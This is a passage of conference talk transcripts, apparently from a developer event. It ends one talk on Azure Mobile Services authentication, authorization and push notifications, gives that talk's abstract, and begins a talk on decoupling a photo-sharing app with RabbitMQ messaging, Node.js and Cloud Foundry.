that. In the future, definitely. Kind of one of the big things in the next six to 12 months for us is kind of enabling these hybrid enterprise scenarios, so either using your own database. Or what's also interesting is from within your server script, using something like a service bus relay to just talk into your enterprise to an existing data store that you don't want to host up in Azure. So the expense app is actually a good example. You don't want to host the expense data up in Azure. You don't want to copy it. You just want to kind of open just one pipe just to that server from the cloud. And you don't want anybody else to have access to that. So that's definitely something that's not there today. But we're looking at that. Question? Can you access the SQL Azure from another server? Yeah, so the SQL server I'll show you, actually. We don't swallow it. Like we don't hide it from you. So if you go back to the portal, if I go up here to my configure, I think, you'll see it tells you, OK, it's the SQL database on this SQL server. So I can just click this arrow and actually take me to the SQL tab in the portal. And I can go and open the SQL management studio and go and look at it myself. So you can back it up and do all those things. So we covered data. That's kind of the first thing we always talk about. And then let's talk about auth. And this is where a lot of people fall asleep a little bit, so tell me if you're super bored. So the main, I'm going to go into the slide, the main goal with auth is to authenticate the app user in the app itself. So you can kind of customize it, show their little smiley face in the corner and put their name, hello, so and so. But also what's more important, actually, more interesting is to authenticate them on the server. So we can have their identity on the server. And then based on that, we can do authorization. And we can create some kind of rules on the server and things like that. So at the end of these authentication flows, we want to have their identity both on the client and the server. So our first authentication flow is what we call server auth. And this is kind of an OAuth 2-based flow using a little browser widget that we invoke. So when you call a login API on mobile service client, and it'll kind of open a little browser, and they'll type in their credentials, you saw me do that in the phone app. So that's kind of the server flow. And it's super simple. It's just one line of code. The developer types their credentials directly into the kind of the website, like a live ID or Facebook. And then the auth provider, still using the browser, will kind of redirect this authentication token back to the mobile service back end. So that's how we get the identity. And then mobile service will pass back to you some parts of that identity. So now you know who the person is, their user ID. So this is kind of the simplest way to do authentication. It uses this little browser control. You don't need an SDK from the auth provider. You don't need to figure out live connect or any of those things. This is very easy, but a little bit limited. Because mobile services is the one who manages the authentication token. So if you want to add extra permissions to it, you want to say, I want access to their basic information and their pictures maybe also. You can't really do that, because we manage the token for you. So if you want to do graph access against Facebook or Twitter, it's kind of limited what you can get using this flow. But it is very quick. That's kind of why it's the first one we talk about. We also have a client flow that relies on kind of a device specific, provider specific SDK. So a good example of that is on Windows 8, if I use the live connect SDK, it actually does single sign on for me. So when you saw my Win8 app, I didn't have to type in anything. I'm logged in with my live ID. The app knows exactly who I am. But for that, I have to use a native SDK for live connect. The same for Google and Android, right? They'll do single sign on. The same for Twitter does that. But I know definitely, I think Facebook does it on iOS. Facebook has kind of a built in thing on iOS that can authenticate you. So if you want to take advantage of these capabilities, we enable you to do that. So you'll type in your credentials in whatever their SDK does. It may have some native prompt or I don't know what it does. At this point, mobile services is not involved. And it'll send you back a token. So now you know who the user is. And you requested that token. So you could say, well, I want permission to access their picture library, their friends, their social security number, their credit card. You can add all those claims to the token because you requested it. And then you give it to mobile services so we can also get the identity of the user. So this is kind of a little bit trickier because you need to understand how their auth SDK works. And it's quite a bit more code. But it's powerful because now that token, because you requested it, you can put all the things on it and have quite rich graph access both on the client and on the server. So depending on your needs, if you just want something quick and dirty, use a server flow with the iFrame and kind of passive OAuth. If you want single sign on or rich graph access, you'd probably use the client authentication. I know this is a little bit dense. So let me show you some code here. Here's the, I skipped over the authentication method before. I'll show it to you now. Authenticate, there it is. So in this live auth client, so that comes from this reference I added over here to the live SDK. So I had to pull in the live SDK for win8. So I use, and this is boilerplate code from their documentation. I had to use the live auth client. And I call login on their client. And then when their authentication flow is done, I call this login with Microsoft account. That's how I pass, and then, sorry, you can't see it very well here, I pass the authentication token that they gave me in the result. I pass that back to mobile services so I can authenticate on the server. I could take this token now on the client and continue using it against live to get even more stuff about that user. So that's how it looks on Windows 8. On Windows phone, it is very similar. It's just a few tiny differences, but largely the same SDK. So you can go here, find the authenticate method. You notice it's kind of the same shape, and I end up doing the same thing. Just pass mobile services authentication token now. So this is the client flow because I want that nice single sign on. Now, if I wanted to do the server flow, let me show you how really easy that is. So I'd say something like, you know, get a reference to my client here, and then I do client login. So notice I'm using a different overload of login. So I just call login async here. And it takes the authentication provider. So I'll say, you know, Facebook. And then I need to await this call because it's synchronous. And then by the time, because it's asynchronous, by the time it's done, now here the user will already be authenticated. This login async will take care of popping up the browser, doing all that dance, getting me back to identity. So at that point, if I go and say client, it's current user, I think. Now, this current user object will give me a bunch of information about the user, like their user ID. And that's kind of their identity at this point. So the moment the second line completes, I have all the off on the client. So you can see how it's much, much simpler. But you get a little bit less by doing it this way. Undo all this. I'm going to break my demo. So yeah, so I showed you the client flow and the server flow from within a.NET app. Now, the one thing that I didn't show you is this didn't just work like that for free. So there's a little bit of server configuration I need to do here in mobile services. So if I go inside my app here, I go to the Identity tab. You notice I've pasted these two values for the Microsoft account. So you know when you create an app with these off providers, they need to know who you are, who's trying to authenticate. So they ask you to go to their little portal and create like a manifestation of what you're doing. So you register there and they ask you who you are. And so they know when people are trying to log in, what are you logging into? And when people log into your app, they'll see a little screen saying, so and so I was trying to get your authentication token to talk to a bunch of our resources. And it says who you are. So to do this, I went to this LiveConnect developer center. And this is a little bit tricky. The UX is not great, but it's documented really well on our Dev Center. So I created an application here. And then the key things that it gave me are the client ID and the client secret. So these are the two things I went and then I go ahead and pasted the two of them into my window here. And just a minute on why this client secret is important. This is to prevent spoofing. So if mobile services receives a token, it needs to have a way to verify that that token was actually issued by the authentication provider, not just some other person sitting in the middle. So it's a shared secret model. So this client secret is known both to Live and to Mobile Services. And you don't ever want to put it in the client, even those called client secret. You never want to do that. It's a server thing that sits there. And so when Live sends that token, it signs it with the secret. And then when Mobile Services receives it, it knows to check that signature using this client secret. It's kind of like a symmetric key kind of thing. So that's how we make sure that we can actually trust that token. So when you get something past your user object, you know that's been verified because we've checked it against this client secret. So speaking of that, let's see what's the model in server script to do authorization. So say someone's authenticated, right? How do I tell Mobile Services, OK, only let authenticated people see my data? Don't let anybody else see my data. So if I go to my permissions column here on my games table, you'll notice I have kind of a drop down with a few choices. Everyone is hardly ever used. Anybody with an application key is the default. So that's pretty much, you should consider that to be equivalent to everyone. Because the application key is not really secret. That's something that's bundled into your app in the store. And somebody can download it, reverse engineer it. So you don't want to consider this really like any sort of authorization mechanism. What you really want to do is say only authenticated users. And then you know that people have gone through that authentication flow. And they've presented a valid token that's signed with a correct secret. So this is how I can protect different operations on my table and say, OK, only authenticated people can go ahead and access these. This is very coarse. Like this is only on the operation level. So within an operation, let's see how I can make some more kind of fine-grained decisions. So if I go back to that insert script, somewhere down here, I have a piece of code. So this little thing here. So I have a record of whose turn it is in the game. And you don't want to be able to tell me, OK, well, actually it's my turn. And it's my turn again. So you kind of play yourself all the time. You want to actually protect the other player's turn. So they can try and tell me, OK, I am the active player. But we don't trust that. We actually go and say, OK, user.userID. So we get the ID from the authentication flow to make sure they're not pretending to be the other user. So that's an example where we do this. That's kind of usually how you do this. Also, you'll notice in the players table, I actually keep a record of this user ID. So this is how if somebody logs in, this is how I know they're kind of the same person. When they log in, I always get the same user ID. And so I can associate all their push settings and their name and all that. So that's kind of how I keep a record of them using that user ID. And I only get the user ID if I can figure the off flow. So that's pretty much it for off. Is there any questions? I know it's a little bit quick, but it's a little bit boring also. See a question back there. You're going to have to speak really loud, because I can't hear you at all. I don't have the Android version of this particular app, but I can show you of the login. Yeah, absolutely. That's actually a really good point. So the question is, how does this look in Android? And we've tried to maintain symmetry across all of our SDK. So ideally, if you can write it in.NET, you should be able to write it in Android. So I haven't done this before, but I will go over to our Dev Center and get the answer for you. So if you go in here, we have our authentication tutorial. So you say, get started with authentication. And I'm going to pick Android here, right at the top. And then I'll scroll down here. So there's a little bit of setup and stuff like that. I'll actually find the piece of code where you call login. So there it is, right? So client is the client instance that I created of my mobile services client. I call login. I have the same choice of authentication provider. And then async code looks a little bit different in Android. They don't have a wait, but they have this callback style programming. So this callback fires asynchronously when the thing completes. And then on completed, I get a reference to the user. So code looks very similar if you exclude the platform specific things. So I love our Dev Center. It's great. And we have a cheat sheet for all different clients. And you can go and if you want to see how you do this in iOS, which is all going to look like spaghetti to me if I try to actually understand it. But somewhere here, there will be something that looks like a login. Maybe it's this one. I guess? I mean, really? That's it, I think. It's true. OK, great. So we're done with authentication. Let's move on to the kind of the fun part, the push notifications. You had a question? How about your own authentication mechanism, like KD? Yeah, so that's a great question. The question is, can you have your own authentication mechanism? The short answer is currently we don't give you one out of the box. Currently, there's kind of my fellow PM Josh Twist. He has a blog post where he talks about how to do custom authentication. It's kind of going back to this enablement thing. It's very, it's a little bit manual, but you can do it. Going forward, we're definitely considering like a first class thing where you're going to go and federate with Active Directory, make it super easy, kind of the simplicity part. Currently, we're kind of the enablement part when it comes to custom auth. And then we want to get back to the simple thing to enable that as well. Currently, no, though. Currently, almost. Yeah, I don't think if, I don't know if anybody has done it with Active Directory. People have done kind of custom auth like where you have your own table, where you manage username's passwords with the right hashing and all of that. I don't know for sure that anybody has done Active Directory. So maybe you'll be the first. And you'll send me an email after. And then I'll talk about it. And people will think I'm smart. So how does push notifications work? So you're probably familiar that all the different phone vendors have their own push notification service. So Microsoft has two, actually, because we're extra special. We have WNS for Windows 8, and we have MPNS for phone 8. So that's how you push to those devices. Apple has APNS or APN. GCM is for Google. And the regular flow, the way you would do this is, imagine you don't even have mobile services in the pictures. The first thing is the device through some magic out of band way registers for a push channel. So I don't know how they do it. Is it HTTP, or is it something like in the network, in the cellular network? I don't know how it does it. But it basically checks in with the authentication service and says, OK, here I am. I'm ready to receive push notifications about something. And what it gets in return is this channel, which is kind of its address. So if somebody wants to send a push notifications, it can go back to the notification service with that channel and say, send this guy something. So the way we normally do this is, so then the device registers for channel, then sends it back to mobile services. And mobile services will stash it away in a table somewhere for later use. Probably will stash it with a person's user ID. So then we can later say, OK, this person needs a push notification. So you look up their channel, and you go ahead and you send them a notification directly with the notification service. This is great. It's very simple. But you can see how this will quickly start to fall apart if you are talking about really massive scale here. So the one problem with this is if you have a million users of your app, and you want to send a single push notifications to all million users, how many calls are you going to be making for mobile services? A million, right? You'll be making a call for every single notification you want to send. So this is great for small scale. And if you don't have these large blasts of notifications where everybody has to get the same one, if it's always the custom notification that's always very specific to just one person, then you're not really wasting much. But if you're broadcasting the same thing to a lot of people, this gets really tedious. So for that, we have this integration with another Azure feature called notification hubs. How many of you have heard about notification hubs? Very few. So it's this extra service that takes away some of this channel management and pushing for you. It's kind of this separate little infrastructure piece that takes that away. So the flow starts the same way. So you'll register your channel with the push service. Then instead of giving it to mobile services, and then you use the developer and mobile services, you have to now create a table and manage it, you give it to notification hubs, and you label it with a tag. So you say, my funky app, or people that should get notifications about app update or something. You create a descriptive tag that describes a group of people that you want to add this to. And then all mobile service has to do is send a single call to that tag saying, OK, everybody who's listening for app updates, I have my new version, I have a bug. You just send one notification to the tag. And notification hubs is responsible for delivering the million notifications through the respective notification service to the million devices that have registered for that tag. So it's kind of a mechanism to deliver push at scale. So notification hubs will do the heavy lifting for you, so then you don't have to do it in your mobile service script. Let's go ahead and do a quick demo, because I only have 12 minutes left. So let's go inside my Windows 8 app here. How many of you have done push notifications with Windows 8 so I can maybe skip over? OK, not very few. OK, a lot. So let's go to this check registration method. So this stuff here is kind of standard Windows 8 stuff. So you say, OK, this is kind of the black magic where the Windows 8 app talks to the notification service and registers. I don't know what happens in this call, but all I know is I get a channel back. And that's a URI that we can now use to address the phone. And then I actually stuff it right inside my player object. So I have this WNS property. It's in the player table where I had all my registered players, and I just send it to the channel URI. So that's all I need to do on the server to capture the channel and send it to the back end. On the phone, it's exactly the same except the property is called MPNS channel. OK, now the interesting part is how do I actually deliver the notification from my back end? So if I go here, I probably guessed that it's inside that giant update script in my game table, such as everything else. So somewhere down here, I have a function that I think right at the bottom. There it is. So this is a function to deliver a toast notification. So you'll notice I use this tables object again. I get my players table from within my game update. And then this is the power of this node model and this JavaScript server model. Like I'm actually talking to a different table now from the script for this table. It lets me combine things easily. So I get my players table here. I pull up the records for that user ID. Or there's actually going to be a unique record because user IDs are unique. And then I go ahead and I pull up the channel. So I say, OK, here's the WNS channel. It's just living in that property. The MPNS channel is living in that property. And then we have this very simple API. So we say push.wns, pass the channel, pass your message. And it's pretty much symmetric across the WNS and MPNS. And it's pretty much symmetric across APNS and GCM as well. It's very similar looking. So it's very easy to do it this way. I had to do one little piece of config here, which is again required for the push notification service and mobile service to establish a trust relationship. So for Windows, I had to paste these credentials from one of the portals. It's documented in our docs. MPNS actually doesn't require, it throttles you at 500 notifications per device per day. So they've said, OK, we don't care if you, we just got to throttle you. You don't need to authenticate. Apple actually uses a sockets-based connection to the notification service. So they actually ask you to upload a certificate to authenticate that you get from their portal. And Google has just an API key similar to WNS. So this is kind of where you configure the push, and that's just that one line in the script to send the notification. For notification hubs, I didn't have a demo prepared, because it's not fully baked in to mobile services yet. But I can show you kind of a slightly more advanced way to do it, which is, like I mentioned in Node, it's kind of an extensible thing. And it has similar to NPM. It has a package manager called NPM. And one of the packages on there is the Azure package, which actually my team ships as well. And the Azure package has support for a lot of these Azure services. So if you want to talk from your mobile service back end to blob storage or table storage, you'd use this Azure package. And so you can use notification hubs through the Azure package. So you just reference it. It's already in the box. You just have to say, require Azure to pull it into scope. And then you kind of create your notification hub reference. And then this is how basically you send to, if you just use this syntax, so WNS, send whatever, this whole thing here, you'll send it to all people that are subscribed to that hub. This first parameter, if you specify a string there or a comma-separated list of strings, then that's where you specify the tag, or set of tags you want to push to. If you pass null, it's everybody. If you pass a set of tags, you'll just push to those tags. So again, easy to do that a little bit more advanced, because you have to use an external module. It's not kind of in the box. But it's easy to reference it. OK. So let's kind of push at a glance. And with that, I'm kind of done with our coding demo. Any questions on push? We spent a little bit of time talking about the timeline and where we're headed with this. OK. So like I said, I think mobile service has been around for less than a year. First, we launched our preview with support for Windows 8. That was kind of the first thing we did. These core scenarios, the data often push. Then we quickly kind of added iOS support, Windows Phone 8 support after that. This was, I think, towards the end of last year. Then early this year, we added a schedule or in support for command line tooling. That's not even something I showed you. But instead of using the portal, you can do a lot of that stuff from command line tooling. It was very recently, about two, three months ago, we added HTML client, notification hubs, Android support. So you see it's kind of very incremental and we're building up on our capabilities. Today, literally today, about six hours ago, we lit up support for custom API and source control. So I'll just kind of show you in the portal where those are. And don't tweet about it until Scott blogs. And then you can all re-blog him. But this is where you do a custom API. A custom API is kind of like a powerful kind of HTTP only script. So for example, if you want to have a submit shopping cart kind of thing, where do you put that? Because that requires updating your list of widgets or whatever you're shipping. And it requires updating your customer table. It requires kind of touching multiple tables. It doesn't make sense really as an insert or update. You see I had that problem with my game script a little bit. My game update, I was putting everything inside the update. So if you have these kind of bigger pieces of script that kind of touch multiple tables, you can just create an HTTP, just the random HTTP API, like submit, order. And then you can configure different permissions for the different HTTP operations here. And you can just write your script in a very familiar way. The other thing that literally shipped today is support for source control. So a lot of you may have found it kind of frustrating to edit the scripts in the Azure portal. You don't have to anymore. You just go through the set up source control thing. And I'm not going to go through it. It's a very scary message, actually. It says, do you want to enable source control? This is a preview feature. We recommend that you back up your scripts regularly. So that's pretty intimidating. But if you press that button, you can use Git to push your scripts to your service after backing them up regularly. So these are kind of the two new things. And then there's kind of a bunch of question marks after that. What happens after this? So I can't tell you the order of these boxes, but I can tell you what's in some of them. One of the big ones that is on our mind is general availability for the service. You saw the preview tags everywhere, and kind of the preview language. We're looking to make mobile services generally available sometime this year. So you can kind of put the full backing of Azure with compliance and disaster recovery and all those things built right in so you can really trust us with your data. Another thing is kind of this set of enterprise scenarios that I already talked about, basically connecting to an existing data store, connecting to an on-premise data store. So that's another big direction. A third big direction is what we call brand applications. So we realize a lot of developers out there, a lot of studios and consultancies out there, really have this kind of same sort of requirement. They'll have a customer come and say, build this very cool app that really showcases kind of our brand. Might not be super feature rich, but we need something quickly out there for people to sign up for our fishing ships campaign. It needs to be catchy, but we need to get it done quickly. So we want to tailor for those scenarios as well. So kind of agencies and then enterprises, big directions going forward for mobile services. And that doesn't mean if you're just an indie developer doing a game with mobile services like I did, that doesn't mean that's not OK. You can still do that. We're still going to support you just the same. But that's kind of where the big new feature areas are going to be. Great. Already touched on this, but in your server scripts, if you want to use Pusher to send push notifications to web browsers, or you want to use SendGrid to send email, or use Twilio to send SMS, we have these partnerships through the Azure Store. So if I go ahead and go into the Azure Store here, I can go ahead and I already have a Pusher extension that I've added before, but I can go ahead and add a new extension here so I can pull in, let's say SendGrid if I want my server script to send some email, let's go find it in the list here. And we automatically configure the billing relationship with SendGrid. Of course, a lot of these are free to start. SendGrid is free for the first couple of thousand emails or something like that. But after that, you'll just get one bill from Microsoft. The SendGrid stuff is going to get added to the bill. You don't have to go and separately register. So that's kind of a neat thing. And last but not least, our customers. We've seen quite good adoption of mobile services, especially in Windows 8. It's hard to make the argument to Android and iOS developers to come and use a Microsoft product and use something with Windows in its name. It's a little bit of a hard sell for us. But as you've seen, the platform itself, there's nothing really Windows specific. All the APIs I showed you, they all work on Android and they all work on iOS. So there's nothing about mobile services, and we use Node on the back end. So there's nothing that traps you into the Microsoft ecosystem if you want to do an iOS app or an Android app. It's just been slightly tricky to get that message across. So please spread the word. One of our very exciting apps in the store is actually VGTV. And this is probably the one country where people know what VGTV is, right? There's no VGTV. Please tell me someone knows. OK, good, OK. All right, good. Yeah, so they're a TV channel and a website, I think, or a website that's trying to turn into a TV channel, or something like that. But they have a great app and they really use everything. They use data. They use push notifications. It's a great app. You can go and grab it in the store right now. So with that, go ahead and sign up. We have a short URL. If you go to windowsazure.com. You can sign up for our service. And with that, I'm pretty much out of time. Thank you very much for staying with us. Out of time, thank you very much for staying around for the last session. Please go ahead and give me any feedback. Send me an email if you loved it or you hated it. If you need more information, my Twitter and Facebook are on there. I can write my, sorry, my Twitter and blog are on there. I can write my email address for you if you have a question. But other than that, thank you very much. And we have unlimited time for questions since it's the last session. So you can be here all night. You don't have to go to the party. This is the parties right here.
|
Azure Mobile Services lets you provision a cloud backend for your mobile apps without the need for server code, while you focus on what’s important: your app’s user experience. Use any client platform, including iOS, Android, and PhoneGap. Easily configure authentication for your app users with their Facebook, Twitter, Google, or Microsoft Account credential. With a few lines of code, send push notifications or run scheduled jobs on the server. In this talkwe will dive deeply into these areas and implement a rich app ready to submit to the app store.
|
10.5446/51534 (DOI)
|
So, welcome everyone. My name is Álvaro Videl and today I'm going to present about Cloud Messaging with Rabbit MQ and Node.js. So a bit about myself. I'm a developer advocate for Cloud Foundry and Rabbit MQ as well. That's my blog and that's my Twitter. And I'm the co-author of this book, Rabbit MQ in Action. So if you want to get a copy, they have it there at the mini library or mini bookshop they have. So the goal of this talk is to show how can we use Rabbit MQ and Node and so on to build an application and how we can decouple the components using Rabbit MQ and Messaging. So the first question is like why do we need Messaging? Okay, I can kind of know the answer for that but maybe everybody can say but I just have a database or I don't know why should I care about this kind of technology. And I always like to illustrate this question with a very simple example that is very easy to understand and to follow. So when we build a classic web application, for example, we can be asked to implement a photo gallery. And when we build this up, we have like an upload, picture form and the image gallery which we can answer to the product owner like this is pretty simple to implement and we can even have a nicely set up schedule, let's say. But at some point we start to get new requirements. And I mean as we know, no project ends as it was designed from the beginning, right? So we get the product owner, it comes to us and say can we also notify the friends of this user whenever there is a new image upload and they want to deploy this tomorrow as usual, every feature is urgent for some reason. Then we get a social media guru in the company and he said that they want to give batches to users for each picture upload, similar to for example, but for square does. And also send everything to Twitter, so to spam every follower basically. I don't know but two years ago everybody was blocking the for square tag on Twitter, if you remember. Then we have the CIS admin or as I like to say in Switzerland we have Swiss admins and these guys will come to you and say that you are delivering the image at full size and of course the bandwidth build has tripled and they need to get this fixed for yesterday because we are throwing money out of the window. This may sound a bit stupid but in a company I was working in China we had at some point the bandwidth build from a video service we built so in this dating site people could film themselves, you can imagine what they were doing and they will stream all this video everywhere and at some point all these terabytes came back to us and they were not so happy about the whole feature. So then we have developers in other teams that we usually talk to them, not all the time but sometimes and let's say we implemented the first thing in PHP and they need to call that from Python or even Java. Then there is the user. We always forget that there is somebody that will actually use our feature. Usually we just like machines shipping code there, we don't even care what the feature is about. We just know that some product owner asked us to implement it. So it's like a water fallage, these guys are scrum usually. There is a user there that doesn't really care that the application needs to resize images, that the application needs to tweet about it or whatever. If I'm a user of your app I just want to click upload and see the image ready. I don't really care what your app needs to do in the background so don't make me wait for that. Then there is us after the whole story we started with a very simple design and now we want to probably quit and do something else. So let's see the evolution of the code. If we have a normal web app let's say with modules, controllers and so on. I will be using pseudo code here. These are comments, that's the function name or method if you want. Those are the arguments and that's the function body and that's the return value. If this sounds familiar to you then you probably know Erlang, that's just Erlang syntax because I think it's very unclutter syntax to show what you want to show. So in the first implementation we were asked to implement an image controller. There was a put method where we get the image and then we called the image handler, did the upload, probably inserting something on the database and moving the file from the temporary file system to the actual final location. Finito. But at some point we had to add the method to resize the picture. Of course this required that we redeploy all this code. Then we were asked to notify the friends, again redeploy all the code, add points to the user, redeploy the code and so on and tweet for a new image. So the question that this code has is like can the code scale to new requirements? What happens if we need to speed up image conversion? In that kind of code we need to probably add more web servers where we just want to scale the resizing, we are scaling for everything even if we don't need it. What happens if we need to send notifications by email? So we need to go and deploy again. What happens if, let's say, Google decides to create his own social network and then we need to send stuff there and not to Twitter? What if we need to resize in different formats? What if we need to swap the language technology without any downtime? So resizing in PHP is too slow, maybe we can do it in Java or C++ or whatever. And yeah, we want to implement all that. Because usually when we speak about scaling we just think about maybe a horizontal scaling or a scaling app, but we don't think that maybe at some point we need to scale down actually. So at night stop having so many consumers resizing images. If you are deployed into a cloud service like EC2 or something, you probably want to pay less money at night or when your website is not so much used. In this dating site we built in China, we knew like when people before going to work they were using the website a lot at lunch and when they left work. So those were the big times where we had to have more workers, for example. So is there a way to do better? Of course. I'm here to sell messaging, so that's what I'm saying. And in messaging if you know this book Enterprise Integration Patterns, this image is from that book and that's just a very simple publish-subscribe pattern. In this case the example the book has is for an address change event that is sent over a channel and then there will be three consumers doing whatever they want to do with that event. That's basically what we could have implemented before. So the first controller we can implement will do the image upload as usual, then it will create a structure with the user data and the image data, I mean metadata not the actual binary of the image that will be very inefficient to move around an image all the time. And then we should publish a message saying new image that will be the tag of the message. Then somewhere we can start friends, notifier, consumer or subscriber and this one will listen on the new image event and it will notify the friends. From the message it will get the user data and the image and will do something with that. Then we have a points manager that will add points to the user and a resizer. The point here is that any of these processes can run on their own and we can fire many of them or just one or none of them by using messaging. And actually let's say we only want to give points to users at night when there are no users on the website so we have the load is low so we can run more background workers for example. A messaging system that implements queuing will queue all this messaging while the other end of the network is offline, in this case the points manager and we can put it back online at night and it will process all that queue of messages. So there are many advantages if we decouple the architecture using messaging like that being one of them scaling and so on. Also any of these consumers could be implemented in any language that don't need to be in PHP as was the example or Node.js or whatever. And the second implementation for that there is no second implementation. We just deploy the first part of the code, that's it. We don't really care about new requirements, of course we care but the thing is we can add them on the go. So that was the example I would like to use later in the talk, it's what I implemented actually to demo this concept. But now maybe you don't know what RabbitMQ is. So RabbitMQ is a multi protocol messaging server. This means RabbitMQ at the moment supports three protocols, AMQP which is the standard and the most supported one but also it supports MQTT and STOMP. Depending on the protocol is what you can do with them but there are many different use cases you can do with each of them. This open source under the Mozilla public lessons is polyglot in the sense that you can connect to RabbitMQ from many languages. If there is a client for any of these protocols in your language of choice then you can use or interact with RabbitMQ. And also now since I don't know how many of you follow the Erlang community but RabbitMQ is written in Erlang and recently, not recently but in the last year let's say there is a new programming language for the Erlang virtual machine. Erlang works similar to Java like you have the JVM and then or the CLR in.NET that you have this virtual machine and then all the languages on top like in Java you have Java itself or Clojure or Scala or whatever. In the case of Erlang now there is a new one called Elixir which is very similar to Ruby in syntax and you can also write plugins and stuff for RabbitMQ using Elixir so you can even mix and match languages at that level if you wanted to extend Rabbit for example. Then as I said it is written in Erlang OTP. What do you care or what should I care that is written in Erlang? Because Erlang is a language made specifically for high concurrent applications and has message passing embedded as the main way of coding in Erlang basically so it is very easy to write servers in Erlang. The OTP is the open telecom platform. What does that even mean? I don't know but the thing is the open telecom platform has a set of patterns that you want to have if you create a distributed system. For example in RabbitMQ whenever Rabbit is reading from the network it has an Erlang process to read from that particular TCP connection. There may be many of those processes listening on the network and then there is a supervisor which is an Erlang process that supervises all those small processes. If you send wrong data over the network then that particular process will crash but you don't want to crash the whole server and you don't want to care about restarting the worker that is reading stuff from the network. The OTP framework will provide you with the supervisor pattern that knows how to restart a worker, not how many times to restart a worker. What will happen is the worker keeps dying and dying and dying and maybe shut down the whole application, maybe shut down this family of workers and so on. The thing is this stuff doesn't need to be implemented by the RabbitMQ developers so less code, less bugs. When we adopted RabbitMQ at this date in the company back in China that was one of the things we liked about it. Besides that we had already deployed Erlang and knew it worked pretty well under high load. We knew all the advantages from the language that they don't need to be written by the Rabbit guys. Then the multi-prod. I said already, MQP is called advanced messaging QM protocol and in the advanced part it actually has a lot of options. When you think about messaging you probably want to send a message and be confirmed that the message arrived to the other end or maybe you don't care. Maybe you want the message to be written to the hard drive or you don't care. You don't want that because you want faster messaging. As a consumer of messages you may want to tell the server whenever you send a message I will acknowledge back that I processed the message so please don't delete the message from the queue until I confirm that I processed the message or on the other end you don't care. You can say send me the message, don't care anymore about this message. All those options are in A and QP. Because of that it could be quite heavy protocol for a small device like in the Internet of Things area. IBM created the protocol MQTT for all these small devices with low battery and so on and Rabbit MQ supports MQTT and it also supports stomp. Stomp is a text-based protocol, very similar if you know the Redis protocol or main cache protocol, it's a very simple stomp test protocol and it's the one that CERN uses when they talk to Rabbit for example. So they prefer to use stomp because also with stomp you can interact with other brokers that's another story. But anyway, if you want to know more one of my colleagues wrote that blog post on the VMware website. When I said polyglot before you can use it with PHP, Node.js, Erlan, Java, Ruby,.NET, Haskell and many more like Clojure, Agai brought recently how to use it from Corva, Delphi, whatever. There are all these protocols and each of them has many clients. The one with the more clients I guess is probably A and QP and stomp because stomp is very, very simple. So also sometimes I get asked by people like is there anybody actually using this Rabbit MQ thing because I don't know some people think this is a research toy or something. Anyway, Instagram is using Rabbit MQ and they are using it clustered across many data centers inside Amazon and actually one of the developers from Instagram tweeted that some months ago when there was a data center going down for Amazon, Rabbit MQ and Cassandra were the only two services that survived this whole data center blowing up. So that was pretty cool to know basically. It's like a show of search website, they are using Rabbit Mailbox app, this application for reading email that got acquired recently, was everywhere on the press. And Mercado Libre, maybe you never heard about Mercado Libre but this is the eighth biggest online retailer. They are the eBay of Latin America, think Latin America 600 million people, Mexico, Brazil, Argentina and Uruguay where I'm from and pretty sure most of the load comes from Uruguay but that's another story. Yeah, they are using Mercado Libre, sorry, Rabbit MQ and if you want to get it, that's the address to get Rabbit MQ. Now the current release is 3.1.1 actually, not 3.0.4. So the next question is how we can start using messaging today. And now it's where I talk about Cloud Foundry. So Cloud Foundry is another product that now is part of Pivotal, before was part of VMware, the same as Rabbit MQ, the same as Redis and many other products. For those of you that don't know, EMC and VMware, they put many of their products together into a new company called Pivotal and Rabbit MQ and Cloud Foundry, Spring Source, Redis and so on all belong to that new company basically. So why Cloud Foundry is good for messaging apart from that I work there basically. So key aspect that Cloud Foundry has. Cloud Foundry supports many applications per account. So Cloud Foundry, I don't like to say that but I have to say it's think about a Heroku that you can deploy on your own data centers for free basically. So Cloud Foundry is on the past level and it's open source so everything that I mentioned in here you can download it, build it and deploy it to your own data center and that's what many companies are actually doing instead of using or dot com offering basically. Anyway when you create an account on Cloud Foundry, this account can have many applications. So what? Right? Then it supports many services per account. You can have many Rabbit MQs, many MongoDB, Redis and so on. So what again? But the good part is that you can share all these services across your apps. So you can have many applications or talking to each other by using Rabbit MQ as a message bus or synchronizing data over MongoDB or Redis for example. And Rabbit MQ is supported by default. So for this example I created an application called Cluster RAM which is just a clone of Instagram basically or clone 1ab I would say. It's a bit going too far to say it's a clone of Instagram. So yeah, kinda. It has real time updates. So the idea of this app is that okay you have your profile there, you upload images, you have friends that follow you, you follow them, some of them, whatever. And whenever you are on the website and you upload a new image then all your friends will see a real time update that you got this new image for some definition of real time of course. Like real time embedded and I don't know how many of these terms don't mean anything today even cloud what does it mean. But anyway, there are many image fields. For example you have the latest images. You can see all what's going on on the website. There is a feed for logged out users so they can actually get to see something. They don't need to register basically. And then the logged in user images. So in your own timeline you will see what you and the people you follow have posted. So let me just show you a bit. This is Cluster RAM. You can upload images. You can use it if you want. Please don't upload anything inappropriate. If you go home, let me see if this works. You can register if you want, create username, password. I won't do anything with this username, password. It's just so you can have a profile basically. And then you have the profile. You can see that I have four pictures, no followers, nobody following and so on. That's basically it. So what's behind this Cluster RAM? So it's deployed in Cloud Foundry. It's using RabbitMQ for all the synchronization of data and moving data around. It uses Redis to store all the metadata related to images and users. And MongoDB for the grid file system to share the actual binary of images. And the real-time stuff on Node.js is implemented using Sock.js. So in Cloud Foundry, you can have all these apps or many instances of one app running there. So to share data around, as I said, I'm using Rabbit. Then at some point, I decided to separate the workers from the core app. And they are also running as a separate app. So that's the front end. That's the resizer in Node. And then just to see if this actually works, I rewrote them in Clojure, deploy that. And the resizers are in Clojure. So the cool part is I could just do this swap of technology without actually having to shut down something or anything. Just deploy the Clojure resizer and that's that. So the MongoDB, as I said, is used for the grid effects image storage that I share across all the app instances. Then Redis has many keys there with different functionality or purpose. So for example, with the user, colon, username, so Alvaro or whoever, you will have your profile stored as a hash. Then with your user ID and images, we keep a list of all your images. With all the IDs of the images, not the actual binary. Then there is the image count of that particular user. Then there is the timeline, which has the IDs of all your images plus the IDs of the people you follow. And then there is this latest images list. So all those lists are kept up to date whenever there is a new image, stuff will get pushed there, basically. Then Sox.js is used for, it has two arrays, let's say, to keep state. In the first one, I just have an array, a JavaScript array, where I keep all the connections, the WebSocket connection from all the anonymous users. And the hash is used because each user by its user ID has an entry there whenever you are connected to the Web site. So if I need to broadcast that there is a new image to all the unknown users, then it's just a loop over this array on the top. And if I need to tell a follower that I had a new image, then I will pick that particular follower and send the image there via Sox.js and the same for my own user. So whenever I do the upload, this should appear right away. So to get everything together, I'm using RabbitMQ. 